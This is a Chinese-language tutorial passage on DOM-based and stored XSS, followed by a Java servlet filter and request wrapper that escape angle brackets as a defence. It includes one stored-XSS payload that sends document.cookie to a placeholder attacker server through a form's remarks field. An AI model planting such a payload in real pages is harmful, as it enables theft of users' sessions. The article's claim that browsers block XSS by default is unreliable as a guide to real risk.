一. Dom-Based XSS 漏洞攻击
危险系数:低
上面这个例子就是典型的 DOM-Based XSS 攻击:黑客把一个链接发送给受害者,受害者点击了这个链接后,黑客就能在自己搭建的服务里获取受害者的 cookie 信息。
分析:
现在的主流浏览器已经默认自带并开启了对于 XSS(Cross Site Scripting)攻击的防护。所以这种类型的攻击危险系数低,且只要用户不点击非官方发来的危险链接即可避免信息被盗。
二.Stored XSS(存储式XSS漏洞)
危险系数: 高,危害大,危害人数多
Alex 发现了网站 A 上有一个 XSS 漏洞,该漏洞允许将攻击代码保存在数据库中。Alex 发布了一篇文章,文章中嵌入了恶意 JavaScript 代码。其他人如 Monica 访问这篇文章的时候,嵌入在文章中的恶意 JavaScript 代码就会在 Monica 的浏览器中执行,其会话 cookie 或者其他信息将被 Alex 盗走。
黑客注册某网站的一个账号,然后自己去申请融资,在备注一栏填写了
<script>window .open('http://黑客自己搭建的一个项目地址?cookie=document.cookie' )</script>
填完以后后台人员在不知情的情况下去审核,这个时候就会触发这个事件,后台人员的cookie就会被盗取。
三.防御措施
以下主要是针对 Java 的防御措施,也可以通过购买 Web 应用防火墙解决
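package com.jlfex.common.servlet;

import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;

/**
 * Servlet filter that wraps AJAX requests in {@link XssHttpServletRequestWrapper} so that the
 * parameter and header values read by downstream code have their angle brackets HTML-escaped.
 *
 * <p>Only requests carrying {@code X-Requested-With: XMLHttpRequest} are wrapped; every other
 * request is forwarded unchanged. That header is set by the client, so a request without it
 * reaches the application unfiltered. Treat this filter as defence in depth: context-aware
 * output encoding in the view layer remains the primary XSS control.
 */
public class XssFilter implements Filter {

    /** Request header that AJAX libraries use to identify themselves. */
    private static final String REQUESTED_WITH_HEADER = "X-Requested-With";

    /** Header value sent by XMLHttpRequest-based clients. */
    private static final String XML_HTTP_REQUEST = "XMLHttpRequest";

    /** No configuration is read; nothing to initialise. */
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        // intentionally empty
    }

    /**
     * Wraps HTTP requests that identify themselves as XMLHttpRequest in
     * {@link XssHttpServletRequestWrapper} before continuing the chain; all other requests
     * continue untouched.
     *
     * @param request  the incoming request
     * @param response the outgoing response
     * @param chain    the remaining filter chain
     * @throws IOException      propagated from the chain
     * @throws ServletException propagated from the chain
     */
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        // Guard the cast: a non-HTTP request would otherwise fail with ClassCastException.
        if (request instanceof HttpServletRequest
                && isAjaxRequest((HttpServletRequest) request)) {
            chain.doFilter(new XssHttpServletRequestWrapper((HttpServletRequest) request), response);
        } else {
            chain.doFilter(request, response);
        }
    }

    /** No resources are held; nothing to release. */
    @Override
    public void destroy() {
        // intentionally empty
    }

    /**
     * Returns {@code true} when the request declares itself as an XMLHttpRequest.
     *
     * <p>Comparing against the constant is null-safe, so the separate non-empty check (and the
     * commons-lang dependency it needed) is no longer required.
     */
    private static boolean isAjaxRequest(HttpServletRequest request) {
        return XML_HTTP_REQUEST.equals(request.getHeader(REQUESTED_WITH_HEADER));
    }
}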
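package com.jlfex.common.servlet;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;

/**
 * Request wrapper that HTML-escapes the angle brackets in parameter names, parameter values
 * and header values handed to the application.
 *
 * <p>Only {@code <} and {@code >} are rewritten (to {@code &lt;} / {@code &gt;}). Quotes and
 * ampersands are left alone, and {@code getParameterMap()}, {@code getQueryString()} and the
 * request body are not intercepted, so this is an input-side defence in depth rather than a
 * substitute for context-aware output encoding.
 */
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {

    /** The request as received, before wrapping; exposed via {@link #getOrgRequest()}. */
    final HttpServletRequest orgRequest;

    /**
     * @param request the request to wrap; kept so callers can reach the unescaped original
     */
    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
        orgRequest = request;
    }

    /**
     * Returns the escaped value of the named parameter, or {@code null} when absent.
     *
     * <p>The name is escaped before lookup, so a parameter whose name contains angle brackets
     * is looked up under its escaped form.
     */
    @Override
    public String getParameter(String name) {
        String value = super.getParameter(xssEncode(name));
        return value == null ? null : xssEncode(value);
    }

    /**
     * Returns the escaped values of the named parameter, or {@code null} when the parameter is
     * absent or has no values (an empty array is collapsed to {@code null}).
     */
    @Override
    public String[] getParameterValues(String name) {
        String[] results = super.getParameterValues(xssEncode(name));
        if (results == null || results.length == 0) {
            return null;
        }
        for (int i = 0; i < results.length; i++) {
            results[i] = xssEncode(results[i]);
        }
        return results;
    }

    /** Returns the escaped value of the named header, or {@code null} when absent. */
    @Override
    public String getHeader(String name) {
        String value = super.getHeader(xssEncode(name));
        return value == null ? null : xssEncode(value);
    }

    /**
     * Replaces {@code <} and {@code >} with their HTML entities.
     *
     * @param s the text to escape; {@code null} and empty strings are returned unchanged
     * @return the escaped text
     */
    private static String xssEncode(String s) {
        if (s == null || s.isEmpty()) {
            return s;
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '>':
                    // Append the entity, not the matched character: appending '>' back would
                    // make the whole method a no-op and leave the wrapper without effect.
                    sb.append("&gt;");
                    break;
                case '<':
                    sb.append("&lt;");
                    break;
                default:
                    sb.append(c);
                    break;
            }
        }
        return sb.toString();
    }

    /** @return the request as received, before any escaping */
    public HttpServletRequest getOrgRequest() {
        return orgRequest;
    }

    /**
     * Unwraps {@code req} when it is an {@link XssHttpServletRequestWrapper}; any other request
     * is returned as-is.
     *
     * @param req a possibly wrapped request
     * @return the unescaped original request
     */
    public static HttpServletRequest getOrgRequest(HttpServletRequest req) {
        if (req instanceof XssHttpServletRequestWrapper) {
            return ((XssHttpServletRequestWrapper) req).getOrgRequest();
        }
        return req;
    }
}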
```